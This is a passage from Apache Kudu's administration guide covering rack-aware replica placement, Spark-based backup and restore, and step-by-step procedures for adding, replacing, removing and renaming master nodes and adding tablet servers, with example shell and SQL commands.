place the replicas in a\nway that complies with the placement policy. For example, in a cluster with five\ntablet servers `A`, `B`, `C`, `D`, and `E`, with respective locations `\/L0`,\n`\/L0`, `\/L1`, `\/L1`, `\/L2`, to comply with the placement policy a new 3x\nreplicated tablet could have its replicas placed on `A`, `C`, and `E`, but not\non `A`, `B`, and `C`, because then the tablet would have 2\/3 replicas in\nlocation `\/L0`. As another example, if a tablet has replicas on tablet servers\n`A`, `C`, and `E`, and then `C` fails, the replacement replica must be placed on\n`D` in order to comply with the placement policy.\n\nIn the case where it is impossible to place replicas in a way that complies with\nthe placement policy, Kudu will violate the policy and place a replica anyway.\nFor example, using the setup described in the previous paragraph, if a tablet\nhas replicas on tablet servers `A`, `C`, and `E`, and then `E` fails, Kudu will\nre-replicate the tablet onto one of `B` or `D`, violating the placement policy,\nrather than leaving the tablet under-replicated indefinitely. The\n`kudu cluster rebalance` tool can reestablish the placement policy if it is\npossible to do so. The `kudu cluster rebalance` tool can also be used to\nestablish the placement policy on a cluster if the cluster has just been\nconfigured to use the rack awareness feature and existing replicas need to be\nmoved to comply with the placement policy. See\n<<rebalancer_tool_with_rack_awareness,running the tablet rebalancing tool on a rack-aware cluster>>\nfor more information.\n\nThe third and final element of Kudu's rack awareness feature is the use of\nclient locations to find \"nearby\" servers. As mentioned, the masters also\nassign a location to clients when they connect to the cluster. The client\n(whether Java, {cpp}, or Python) uses its own location and the locations of\ntablet servers in the cluster to prefer \"nearby\" replicas when scanning in\n`CLOSEST_REPLICA` mode. Clients choose replicas to scan in the following order:\n\n. Scan a replica on a tablet server on the same host, if there is one.\n. Scan a replica on a tablet server in the same location, if there is one.\n. Scan some replica.\n\nFor example, using the cluster setup described above, if a client on the same\nhost as tablet server `A` scans a tablet with replicas on tablet servers\n`A`, `C`, and `E` in `CLOSEST_REPLICA` mode, it will choose to scan from the\nreplica on `A`, since the client and the replica on `A` are on the same host.\nIf the client scans a tablet with replicas on tablet servers `B`, `C`, and `E`,\nit will choose to scan from the replica on `B`, since it is in the same\nlocation as the client, `\/L0`. If there are multiple replicas meeting a\ncriterion, one is chosen arbitrarily.\n\n[[backup]]\n== Backup and Restore\n\n[[logical_backup]]\n=== Logical backup and restore\n\nAs of Kudu 1.10.0, Kudu supports both full and incremental table backups via a\njob implemented using Apache Spark. Additionally it supports restoring tables\nfrom full and incremental backups via a restore job implemented using Apache Spark.\n\nGiven the Kudu backup and restore jobs use Apache Spark, ensure Apache Spark\nis installed in your environment following the\nlink:https:\/\/spark.apache.org\/docs\/latest\/#downloading[Spark documentation].\nAdditionally review the Apache Spark documentation for\nlink:https:\/\/spark.apache.org\/docs\/latest\/submitting-applications.html[Submitting Applications].\n\n==== Backing up tables\n\nTo backup one or more Kudu tables the `KuduBackup` Spark job can be used.\nThe first time the job is run for a table, a full backup will be run.\nAdditional runs will perform incremental backups which will only contain the\nrows that have changed since the initial full backup. A new set of full\nbackups can be forced at anytime by passing the `--forceFull` flag to the\nbackup job.\n\nThe common flags that will be used when taking a backup are:\n\n* `--rootPath`: The root path to output backup data. Accepts any Spark-compatible path.\n** See <<backup_directory>> for the directory structure used in the `rootPath`.\n* `--kuduMasterAddresses`: Comma-separated addresses of Kudu masters. Default: localhost\n* `<table>...`: A list of tables to be backed up.\n\nNote: You can see the full list of Job options at anytime by passing the `--help` flag.\n\nBelow is a full example of a `KuduBackup` job execution which will backup the tables\n`foo` and `bar` to the HDFS directory `kudu-backups`:\n\n[source,bash]\n----\nspark-submit --class org.apache.kudu.backup.KuduBackup kudu-backup2_2.11-1.10.0.jar \\\n --kuduMasterAddresses master1-host,master-2-host,master-3-host \\\n --rootPath hdfs:\/\/\/kudu-backups \\\n foo bar\n----\n\n==== Restoring tables from Backups\n\nTo restore one or more Kudu tables, the `KuduRestore` Spark job can be used.\nFor each backed up table, the `KuduRestore` job will restore the full backup\nand each associated incremental backup until the full table state is restored.\nRestoring the full series of full and incremental backups is possible because\nthe backups are linked via the `from_ms` and `to_ms` fields in the backup metadata.\nBy default the restore job will create tables with the same name as the table\nthat was backed up. If you want to side-load the tables without affecting the\nexisting tables, you can pass `--tableSuffix` to append a suffix to each\nrestored table.\n\nThe common flags that will be used when restoring are:\n\n* `--rootPath`: The root path to the backup data. Accepts any Spark-compatible path.\n** See <<backup_directory>> for the directory structure used in the `rootPath`.\n* `--kuduMasterAddresses`: Comma-separated addresses of Kudu masters. Default: `localhost`\n* `--createTables`: If set to `true`, the restore process creates the tables.\n Set to `false` if the target tables already exist. Default: `true`.\n* `--tableSuffix`: If set, the suffix to add to the restored table names.\n Only used when `createTables` is `true`.\n* `--timestampMs`: A UNIX timestamp in milliseconds that defines the latest time\n to use when selecting restore candidates. Default: `System.currentTimeMillis()`\n* `<table>...`: A list of tables to restore.\n\nNote: You can see the full list of job options at anytime by passing the `--help` flag.\n\nBelow is a full example of a `KuduRestore` job execution which will restore the tables\n`foo` and `bar` from the HDFS directory `kudu-backups`:\n\n[source,bash]\n----\nspark-submit --class org.apache.kudu.backup.KuduRestore kudu-backup2_2.11-1.10.0.jar \\\n --kuduMasterAddresses master1-host,master-2-host,master-3-host \\\n --rootPath hdfs:\/\/\/kudu-backups \\\n foo bar\n----\n\n==== Backup tools\n\nAn additional `backup-tools` jar is available to provide some backup exploration and\ngarbage collection capabilities. This jar does not use Spark directly, but instead\nonly requires the Hadoop classpath to run.\n\nCommands:\n\n* `list`: Lists the backups in the rootPath.\n* `clean`: Cleans up old backup data in the rootPath.\n\nNote: You can see the full list of command options at anytime by passing the `--help` flag.\n\nBelow is an example execution which will print the command options:\n\n[source,bash]\n----\njava -cp $(hadoop classpath):kudu-backup-tools-1.10.0.jar org.apache.kudu.backup.KuduBackupCLI --help\n----\n\n[[backup_directory]]\n==== Backup Directory Structure\n\nThe backup directory structure in the `rootPath` is considered an internal detail\nand could change in future versions of Kudu. Additionally the format and content\nof the data and metadata files is meant for the backup and restore process only\nand could change in future versions of Kudu. That said, understanding the structure\nof the backup `rootPath` and how it is used can be useful when working with Kudu backups.\n\nThe backup directory structure in the `rootPath` is as follows:\n\n[source,bash]\n----\n\/<rootPath>\/<tableId>-<tableName>\/<backup-id>\/\n .kudu-metadata.json\n part-*.<format>\n----\n\n* `rootPath`: Can be used to distinguish separate backup groups, jobs, or concerns.\n* `tableId`: The unique internal ID of the table being backed up.\n* `tableName`: The name of the table being backed up.\n** Note: Table names are URL encoded to prevent pathing issues.\n* `backup-id`: A way to uniquely identify\/group the data for a single backup run.\n* `.kudu-metadata.json`: Contains all of the metadata to support recreating the table,\n linking backups by time, and handling data format changes.\n** Written last so that failed backups will not have a metadata file and will not be\n considered at restore time or backup linking time.\n* `part-*.<format>`: The data files containing the tables data.\n** Currently 1 part file per Kudu partition.\n** Incremental backups contain an additional \u201cRowAction\u201d byte column at the end.\n** Currently the only supported format\/suffix is `parquet`\n\n==== Troubleshooting\n\n===== Generating a table list\n\nTo generate a list of tables to backup using the `kudu table list` tool along\nwith `grep` can be useful. Below is an example that will generate a list\nof all tables that start with `my_db.`:\n\n[source,bash]\n----\nkudu table list <master_addresses> | grep \"^my_db\\.*\" | tr '\\n' ' '\n----\n\n*Note*: This list could be saved as a part of you backup process to be used\nat restore time as well.\n\n===== Spark Tuning\n\nIn general the Spark jobs were designed to run with minimal tuning and configuration.\nYou can adjust the number of executors and resources to increase parallelism and performance\nusing Spark's\nlink:https:\/\/spark.apache.org\/docs\/latest\/configuration.html[configuration options].\n\nIf your tables are super wide and your default memory allocation is fairly low, you\nmay see jobs fail. To resolve this increase the Spark executor memory. A conservative\nrule of thumb is 1 GiB per 50 columns.\n\nIf your Spark resources drastically outscale the Kudu cluster you may want to limit the\nnumber of concurrent tasks allowed to run on restore.\n\n===== Backups on Kudu 1.9 and earlier\n\nIf your Kudu cluster is version 1.9 or earlier you can still use the backup tool\nintroduced in Kudu 1.10 to backup your tables. However, because the incremental\nbackup feature requires server side changes, you are limited to full backups only.\nThe process to backup tables is the same as documented above, but you will need to\ndownload and use the kudu-backup jar from a Kudu 1.10+ release. Before running\nthe backup job you should adjust the configuration of your servers by setting\n`--tablet_history_max_age_sec=604800`. This is the new default value in Kudu 1.10+\nto ensure long running backup jobs can complete successfully and consistently.\nAdditionally, when running the backup you need to pass `--forceFull` to disable\nthe incremental backup feature. Now each time the job is run a full backup will be taken.\n\nNOTE: Taking full backups on a regular basis is far more resource and time intensive\nthan incremental backups. It is recommended to upgrade to Kudu 1.10+ soon as possible.\n\n[[physical_backup]]\n=== Physical backups of an entire node\n\nKudu does not yet provide built-in physical backup and restore functionality.\nHowever, it is possible to create a physical backup of a Kudu node (either\ntablet server or master) and restore it later.\n\nWARNING: The node to be backed up must be offline during the procedure, or else\nthe backed up (or restored) data will be inconsistent.\n\nWARNING: Certain aspects of the Kudu node (such as its hostname) are embedded in\nthe on-disk data. As such, it's not yet possible to restore a physical backup of\na node onto another machine.\n\n. Stop all Kudu processes in the cluster. This prevents the tablets on the\n backed up node from being rereplicated elsewhere unnecessarily.\n\n. If creating a backup, make a copy of the WAL, metadata, and data directories\n on each node to be backed up. It is important that this copy preserve all file\n attributes as well as sparseness.\n\n. If restoring from a backup, delete the existing WAL, metadata, and data\n directories, then restore the backup via move or copy. As with creating a\n backup, it is important that the restore preserve all file attributes and\n sparseness.\n\n. Start all Kudu processes in the cluster.\n\n== Common Kudu workflows\n\n[[migrate_to_multi_master]]\n=== Migrating to Multiple Kudu Masters\n\nFor high availability and to avoid a single point of failure, Kudu clusters should be created with\nmultiple masters. Many Kudu clusters were created with just a single master, either for simplicity\nor because Kudu multi-master support was still experimental at the time. This workflow demonstrates\nhow to migrate to a multi-master configuration. It can also be used to migrate from two masters to\nthree, with straightforward modifications. Note that the number of masters must be odd.\n\nWARNING: The workflow is unsafe for adding new masters to an existing configuration that already has\nthree or more masters. Do not use it for that purpose.\n\nWARNING: An even number of masters doesn't provide any benefit over having one fewer masters. This\nguide should always be used for migrating to three masters.\n\nWARNING: All of the command line steps below should be executed as the Kudu UNIX user. The example\ncommands assume the Kudu Unix user is `kudu`, which is typical.\n\nWARNING: The workflow presupposes at least basic familiarity with Kudu configuration management. If\nusing vendor-specific tools the workflow also presupposes familiarity with\nit and the vendor's instructions should be used instead as details may differ.\n\n==== Prepare for the migration\n\n. Establish a maintenance window (one hour should be sufficient). During this time the Kudu cluster\n will be unavailable.\n\n. Decide how many masters to use. The number of masters should be odd. Three or five node master\n configurations are recommended; they can tolerate one or two failures respectively.\n\n. Perform the following preparatory steps for the existing master:\n* Identify and record the directories where the master's write-ahead log (WAL) and data live. If\n using Kudu system packages, their default locations are \/var\/lib\/kudu\/master, but they may be\n customized via the `fs_wal_dir` and `fs_data_dirs` configuration parameters. The commands below\n assume that `fs_wal_dir` is \/data\/kudu\/master\/wal and `fs_data_dirs` is \/data\/kudu\/master\/data.\n Your configuration may differ. For more information on configuring these directories, see the\n link:configuration.html#directory_configuration[Kudu Configuration docs].\n* Identify and record the port the master is using for RPCs. The default port value is 7051, but it\n may have been customized using the `rpc_bind_addresses` configuration parameter.\n* Identify the master's UUID. It can be fetched using the following command:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs dump uuid --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] 2>\/dev\/null\n----\nmaster_data_dir:: existing master's previously recorded data directory\n+\n[source,bash]\nExample::\n+\n----\n$ sudo -u kudu kudu fs dump uuid --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 2>\/dev\/null\n4aab798a69e94fab8d77069edff28ce0\n----\n+\n* Optional: configure a DNS alias for the master. The alias could be a DNS cname (if the machine\n already has an A record in DNS), an A record (if the machine is only known by its IP address),\n or an alias in \/etc\/hosts. The alias should be an abstract representation of the master (e.g.\n `master-1`).\n+\nWARNING: Without DNS aliases it is not possible to recover from permanent master failures without\nbringing the cluster down for maintenance, and as such, it is highly recommended.\n+\n. If you have Kudu tables that are accessed from Impala, you must update\nthe master addresses in the Apache Hive Metastore (HMS) database.\n* If you set up the DNS aliases, run the following statement in `impala-shell`,\nreplacing `master-1`, `master-2`, and `master-3` with your actual aliases.\n+\n[source,sql]\n----\nALTER TABLE table_name\nSET TBLPROPERTIES\n('kudu.master_addresses' = 'master-1,master-2,master-3');\n----\n+\n* If you do not have DNS aliases set up, see Step #11 in the Performing\nthe migration section for updating HMS.\n+\n. Perform the following preparatory steps for each new master:\n* Choose an unused machine in the cluster. The master generates very little load\n so it can be collocated with other data services or load-generating processes,\n though not with another Kudu master from the same configuration.\n* Ensure Kudu is installed on the machine, either via system packages (in which case the `kudu` and\n `kudu-master` packages should be installed), or via some other means.\n* Choose and record the directory where the master's data will live.\n* Choose and record the port the master should use for RPCs.\n* Optional: configure a DNS alias for the master (e.g. `master-2`, `master-3`, etc).\n\n[[perform-the-migration]]\n==== Perform the migration\n\n. Stop all the Kudu processes in the entire cluster.\n\n. Format the data directory on each new master machine, and record the generated UUID. Use the\n following command sequence:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs format --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>]\n$ sudo -u kudu kudu fs dump uuid --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] 2>\/dev\/null\n----\n+\nmaster_data_dir:: new master's previously recorded data directory\n+\n[source,bash]\nExample::\n+\n----\n$ sudo -u kudu kudu fs format --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data\n$ sudo -u kudu kudu fs dump uuid --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 2>\/dev\/null\nf5624e05f40649b79a757629a69d061e\n----\n\n. If using CM, add the new Kudu master roles now, but do not start them.\n* If using DNS aliases, override the empty value of the `Master Address` parameter for each role\n (including the existing master role) with that master's alias.\n* Add the port number (separated by a colon) if using a non-default RPC port value.\n\n. Rewrite the master's Raft configuration with the following command, executed on the existing\n master machine:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu local_replica cmeta rewrite_raft_config --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] <tablet_id> <all_masters>\n----\n+\nmaster_data_dir:: existing master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\nall_masters:: space-separated list of masters, both new and existing. Each entry in the list must be\n a string of the form `<uuid>:<hostname>:<port>`\nuuid::: master's previously recorded UUID\nhostname::: master's previously recorded hostname or alias\nport::: master's previously recorded RPC port number\n+\n[source,bash]\nExample::\n+\n----\n$ sudo -u kudu kudu local_replica cmeta rewrite_raft_config --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 00000000000000000000000000000000 4aab798a69e94fab8d77069edff28ce0:master-1:7051 f5624e05f40649b79a757629a69d061e:master-2:7051 988d8ac6530f426cbe180be5ba52033d:master-3:7051\n----\n\n. Modify the value of the `master_addresses` configuration parameter for both existing master and new masters.\n The new value must be a comma-separated list of all of the masters. Each entry is a string of the form `<hostname>:<port>`\nhostname:: master's previously recorded hostname or alias\nport:: master's previously recorded RPC port number\n\n. Start the existing master.\n\n. Copy the master data to each new master with the following command, executed on each new master\n machine.\n+\nWARNING: If your Kudu cluster is secure, in addition to running as the Kudu UNIX user, you must\n authenticate as the Kudu service user prior to running this command.\n+\n[source,bash]\n----\n$ sudo -u kudu kudu local_replica copy_from_remote --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] <tablet_id> <existing_master>\n----\n+\nmaster_data_dir:: new master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\nexisting_master:: RPC address of the existing master and must be a string of the form\n`<hostname>:<port>`\nhostname::: existing master's previously recorded hostname or alias\nport::: existing master's previously recorded RPC port number\n+\n[source,bash]\nExample::\n+\n----\n$ sudo -u kudu kudu local_replica copy_from_remote --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 00000000000000000000000000000000 master-1:7051\n----\n\n. Start all of the new masters.\n+\nWARNING: Skip the next step if using CM.\n+\n. Modify the value of the `tserver_master_addrs` configuration parameter for each tablet server.\n The new value must be a comma-separated list of masters where each entry is a string of the form\n `<hostname>:<port>`\nhostname:: master's previously recorded hostname or alias\nport:: master's previously recorded RPC port number\n\n. Start all of the tablet servers.\n. If you have Kudu tables that are accessed from Impala and you didn't set up\nDNS aliases, update the HMS database manually in the underlying database that\nprovides the storage for HMS.\n* The following is an example SQL statement you should run in the HMS database:\n+\n[source,sql]\n----\nUPDATE TABLE_PARAMS\nSET PARAM_VALUE =\n 'master-1.example.com,master-2.example.com,master-3.example.com'\nWHERE PARAM_KEY = 'kudu.master_addresses' AND PARAM_VALUE = 'old-master';\n----\n+\n* In `impala-shell`, run:\n+\n[source,bash]\n----\nINVALIDATE METADATA;\n----\n\n\n==== Verify the migration was successful\n\nTo verify that all masters are working properly, perform the following sanity checks:\n\n* Using a browser, visit each master's web UI. Look at the \/masters page. All of the masters should\n be listed there with one master in the LEADER role and the others in the FOLLOWER role. The\n contents of \/masters on each master should be the same.\n\n* Run a Kudu system check (ksck) on the cluster using the `kudu` command line\n tool. See <<ksck>> for more details.\n\n=== Recovering from a dead Kudu Master in a Multi-Master Deployment\n\nKudu multi-master deployments function normally in the event of a master loss. However, it is\nimportant to replace the dead master; otherwise a second failure may lead to a loss of availability,\ndepending on the number of available masters. This workflow describes how to replace the dead\nmaster.\n\nDue to https:\/\/issues.apache.org\/jira\/browse\/KUDU-1620[KUDU-1620], it is not possible to perform\nthis workflow without also restarting the live masters. As such, the workflow requires a\nmaintenance window, albeit a potentially brief one if the cluster was set up with DNS aliases.\n\nWARNING: Kudu does not yet support live Raft configuration changes for masters. As such, it is only\npossible to replace a master if the deployment was created with DNS aliases or if every node in the\ncluster is first shut down. See the <<migrate_to_multi_master,multi-master migration workflow>> for\nmore details on deploying with DNS aliases.\n\nWARNING: The workflow presupposes at least basic familiarity with Kudu configuration management. If\nusing vendor-specific tools the workflow also presupposes familiarity with\nit and the vendor's instructions should be used instead as details may differ.\n\nWARNING: All of the command line steps below should be executed as the Kudu UNIX user, typically\n`kudu`.\n\n==== Prepare for the recovery\n\n. If the deployment was configured without DNS aliases perform the following steps:\n* Establish a maintenance window (one hour should be sufficient). During this time the Kudu cluster\n will be unavailable.\n* Shut down all Kudu tablet server processes in the cluster.\n\n. Ensure that the dead master is well and truly dead. Take whatever steps needed to prevent it from\n accidentally restarting; this can be quite dangerous for the cluster post-recovery.\n\n. Choose one of the remaining live masters to serve as a basis for recovery. The rest of this\n workflow will refer to this master as the \"reference\" master.\n\n. Choose an unused machine in the cluster where the new master will live. The master generates very\n little load so it can be collocated with other data services or load-generating processes, though\n not with another Kudu master from the same configuration.\n The rest of this workflow will refer to this master as the \"replacement\" master.\n\n. Perform the following preparatory steps for the replacement master:\n* Ensure Kudu is installed on the machine, either via system packages (in which case the `kudu` and\n `kudu-master` packages should be installed), or via some other means.\n* Choose and record the directory where the master's data will live.\n\n. Perform the following preparatory steps for each live master:\n* Identify and record the directory where the master's data lives. If using Kudu system packages,\n the default value is \/var\/lib\/kudu\/master, but it may be customized via the `fs_wal_dir` and\n `fs_data_dirs` configuration parameters. Please note if you've set `fs_data_dirs` to some directories\n other than the value of `fs_wal_dir`, it should be explicitly included in every command below where\n `fs_wal_dir` is also included. For more information on configuring these directories, see the\n link:configuration.html#directory_configuration[Kudu Configuration docs].\n* Identify and record the master's UUID. It can be fetched using the following command:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs dump uuid --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] 2>\/dev\/null\n----\nmaster_data_dir:: live master's previously recorded data directory\n+\n[source,bash]\nExample::\n+\n----\n$ sudo -u kudu kudu fs dump uuid --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 2>\/dev\/null\n80a82c4b8a9f4c819bab744927ad765c\n----\n+\n. Perform the following preparatory steps for the reference master:\n* Identify and record the directory where the master's data lives. If using Kudu system packages,\n the default value is \/var\/lib\/kudu\/master, but it may be customized via the `fs_wal_dir` and\n `fs_data_dirs` configuration parameters. Please note if you've set `fs_data_dirs` to some directories\n other than the value of `fs_wal_dir`, it should be explicitly included in every command below where\n `fs_wal_dir` is also included. For more information on configuring these directories, see the\n link:configuration.html#directory_configuration[Kudu Configuration docs].\n* Identify and record the UUIDs of every master in the cluster, using the following command:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu local_replica cmeta print_replica_uuids --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] <tablet_id> 2>\/dev\/null\n----\nmaster_data_dir:: reference master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\n+\n[source,bash]\nExample::\n+\n----\n$ sudo -u kudu kudu local_replica cmeta print_replica_uuids --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 00000000000000000000000000000000 2>\/dev\/null\n80a82c4b8a9f4c819bab744927ad765c 2a73eeee5d47413981d9a1c637cce170 1c3f3094256347528d02ec107466aef3\n----\n+\n. Using the two previously-recorded lists of UUIDs (one for all live masters and one for all\n masters), determine and record (by process of elimination) the UUID of the dead master.\n\n==== Perform the recovery\n\n. Format the data directory on the replacement master machine using the previously recorded\n UUID of the dead master. Use the following command sequence:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs format --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] --uuid=<uuid>\n----\n+\nmaster_data_dir:: replacement master's previously recorded data directory\nuuid:: dead master's previously recorded UUID\n+\n[source,bash]\nExample::\n+\n----\n$ sudo -u kudu kudu fs format --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data --uuid=80a82c4b8a9f4c819bab744927ad765c\n----\n+\n. Copy the master data to the replacement master with the following command:\n+\nWARNING: If your Kudu cluster is secure, in addition to running as the Kudu UNIX user, you must\n authenticate as the Kudu service user prior to running this command.\n+\n[source,bash]\n----\n$ sudo -u kudu kudu local_replica copy_from_remote --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] <tablet_id> <reference_master>\n----\n+\nmaster_data_dir:: replacement master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\nreference_master:: RPC address of the reference master and must be a string of the form\n`<hostname>:<port>`\nhostname::: reference master's previously recorded hostname or alias\nport::: reference master's previously recorded RPC port number\n+\n[source,bash]\nExample::\n+\n----\n$ sudo -u kudu kudu local_replica copy_from_remote --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 00000000000000000000000000000000 master-2:7051\n----\n+\n. If using CM, add the replacement Kudu master role now, but do not start it.\n* Override the empty value of the `Master Address` parameter for the new role with the replacement\n master's alias.\n* Add the port number (separated by a colon) if using a non-default RPC port value.\n\n. If the cluster was set up with DNS aliases, reconfigure the DNS alias for the dead master to point\n at the replacement master.\n\n. If the cluster was set up without DNS aliases, perform the following steps:\n* Stop the remaining live masters.\n* Rewrite the Raft configurations on these masters to include the replacement master. See Step 4 of\n <<perform-the-migration, Perform the Migration>> for more details.\n\n. Start the replacement master.\n\n. Restart the remaining masters in the new multi-master deployment. While the masters are shut down,\n there will be an availability outage, but it should last only as long as it takes for the masters\n to come back up.\n\nCongratulations, the dead master has been replaced! To verify that all masters are working properly,\nconsider performing the following sanity checks:\n\n* Using a browser, visit each master's web UI. Look at the \/masters page. All of the masters should\n be listed there with one master in the LEADER role and the others in the FOLLOWER role. The\n contents of \/masters on each master should be the same.\n\n* Run a Kudu system check (ksck) on the cluster using the `kudu` command line\n tool. See <<ksck>> for more details.\n\n=== Removing Kudu Masters from a Multi-Master Deployment\n\nIn the event that a multi-master deployment has been overallocated nodes, the following steps should\nbe taken to remove the unwanted masters.\n\nWARNING: In planning the new multi-master configuration, keep in mind that the number of masters\nshould be odd and that three or five node master configurations are recommended.\n\nWARNING: Dropping the number of masters below the number of masters currently needed for a Raft\nmajority can incur data loss. To mitigate this, ensure that the leader master is not removed during\nthis process.\n\n==== Prepare for the removal\n\n. Establish a maintenance window (one hour should be sufficient). During this time the Kudu cluster\nwill be unavailable.\n\n. Identify the UUID and RPC address current leader of the multi-master deployment by visiting the\n`\/masters` page of any master's web UI. This master must not be removed during this process; its\nremoval may result in severe data loss.\n\n. Stop all the Kudu processes in the entire cluster.\n\n. If using CM, remove the unwanted Kudu master.\n\n==== Perform the removal\n\n. Rewrite the Raft configuration on the remaining masters to include only the remaining masters. See\nStep 4 of <<perform-the-migration,Perform the Migration>> for more details.\n\n. Remove the data directories and WAL directory on the unwanted masters. This is a precaution to\nensure that they cannot start up again and interfere with the new multi-master deployment.\n\n. Modify the value of the `master_addresses` configuration parameter for the masters of the new\nmulti-master deployment. If migrating to a single-master deployment, the `master_addresses` flag\nshould be omitted entirely.\n\n. Start all of the masters that were not removed.\n\n. Modify the value of the `tserver_master_addrs` configuration parameter for the tablet servers to\nremove any unwanted masters.\n\n. Start all of the tablet servers.\n\n==== Verify the migration was successful\n\nTo verify that all masters are working properly, perform the following sanity checks:\n\n* Using a browser, visit each master's web UI. Look at the \/masters page. All of the masters should\n be listed there with one master in the LEADER role and the others in the FOLLOWER role. The\n contents of \/masters on each master should be the same.\n\n* Run a Kudu system check (ksck) on the cluster using the `kudu` command line\n tool. See <<ksck>> for more details.\n\n=== Changing the master hostnames\n\nTo prevent long maintenance windows when replacing dead masters, DNS aliases should be used. If the\ncluster was set up without aliases, changing the host names can be done by following the below\nsteps.\n\n==== Prepare for the hostname change\n\n. Establish a maintenance window (one hour should be sufficient). During this time the Kudu cluster\nwill be unavailable.\n\n. Note the UUID and RPC address of every master by visiting the `\/masters` page of any master's web\nUI.\n\n. Stop all the Kudu processes in the entire cluster.\n\n. Set up the new hostnames to point to the masters and verify all servers and clients properly\nresolve them.\n\n==== Perform the hostname change\n\n. Rewrite each master\u2019s Raft configuration with the following command, executed on all master hosts:\n----\n$ sudo -u kudu kudu local_replica cmeta rewrite_raft_config --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] 00000000000000000000000000000000 <all_masters>\n----\n\nFor example:\n\n----\n$ sudo -u kudu kudu local_replica cmeta rewrite_raft_config --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 00000000000000000000000000000000 4aab798a69e94fab8d77069edff28ce0:new-master-name-1:7051 f5624e05f40649b79a757629a69d061e:new-master-name-2:7051 988d8ac6530f426cbe180be5ba52033d:new-master-name-3:7051\n----\n\n. Change the masters' gflagfile so the `master_addresses` parameter reflects the new hostnames.\n\n. Change the `tserver_master_addrs` parameter in the tablet servers' gflagfiles to the new\nhostnames.\n\n. Start up the masters.\n\n. To verify that all masters are working properly, perform the following sanity checks:\n\n.. Using a browser, visit each master's web UI. Look at the \/masters page. All of the masters should\n be listed there with one master in the LEADER role and the others in the FOLLOWER role. The\n contents of \/masters on each master should be the same.\n\n.. Run the below command to verify all masters are up and listening. The UUIDs\nshould be the same and belong to the same master as before the hostname change:\n+\n----\n$ sudo -u kudu kudu master list new-master-name-1:7051,new-master-name-2:7051,new-master-name-3:7051\n----\n\n. Start all of the tablet servers.\n\n. Run a Kudu system check (ksck) on the cluster using the `kudu` command line\ntool. See <<ksck>> for more details. After startup, some tablets may be\nunavailable as it takes some time to initialize all of them.\n\n. If you have Kudu tables that are accessed from Impala, update the HMS\ndatabase manually in the underlying database that provides the storage for HMS.\n\n.. The following is an example SQL statement you should run in the HMS database:\n+\n[source,sql]\n----\nUPDATE TABLE_PARAMS\nSET PARAM_VALUE =\n 'new-master-name-1:7051,new-master-name-2:7051,new-master-name-3:7051'\nWHERE PARAM_KEY = 'kudu.master_addresses'\nAND PARAM_VALUE = 'master-1:7051,master-2:7051,master-3:7051';\n----\n+\n.. In `impala-shell`, run:\n+\n[source,bash]\n----\nINVALIDATE METADATA;\n----\n+\n.. Verify updating the metadata worked by running a simple `SELECT` query on a\nKudu-backed Impala table.\n\n[[adding_tablet_servers]]\n=== Best Practices When Adding New Tablet Servers\n\nA common workflow when administering a Kudu cluster is adding additional tablet\nserver instances, in an effort to increase storage capacity, decrease load or\nutilization on individual hosts, increase compute power, etc.\n\nBy default, any newly added tablet servers will not be utilized immediately\nafter their addition to the cluster. Instead, newly added tablet servers will\nonly be utilized when new tablets are created or when existing tablets need to\nbe replicated, which can lead to imbalanced nodes. It's recommended to run\nthe rebalancer CLI tool just after adding a new tablet server into the cluster,\nas described in the enumerated steps below.\n\nAvoid placing multiple tablet servers on a single node. Doing so\nnullifies the point of increasing the overall storage capacity of a Kudu\ncluster and increases the likelihood of tablet unavailability when a single\nnode fails (the latter drawback is not applicable if the cluster is properly\nconfigured to use the\nlink:https:\/\/kudu.apache.org\/docs\/administration.html#rack_awareness[location\nawareness] feature).\n\nTo add additional tablet servers to an existing cluster, the\nfollowing steps can be taken to ensure tablet replicas are uniformly\ndistributed across the cluster:\n\n1. Ensure that Kudu is installed on the new machines being added to the\ncluster, and that the new instances have been\nlink:https:\/\/kudu.apache.org\/docs\/configuration.html#_configuring_tablet_servers[\ncorrectly configured] to point to the pre-existing cluster. Then, start up\nthe new tablet server instances.\n2. Verify that the new instances check in with the Kudu Master(s)\nsuccessfully. A quick method for verifying they've successfully checked in\nwith the existing Master instances is to view the Kudu Master WebUI,\nspecifically the `\/tablet-servers` section, and validate that the newly\nadded instances are registered, and heartbeating.\n3. Once the tablet server(s) are successfully online and healthy, follow\nthe steps to run the\nlink:https:\/\/kudu.apache.org\/docs\/administration.html#rebalancer_tool[\nrebalancing tool] which will 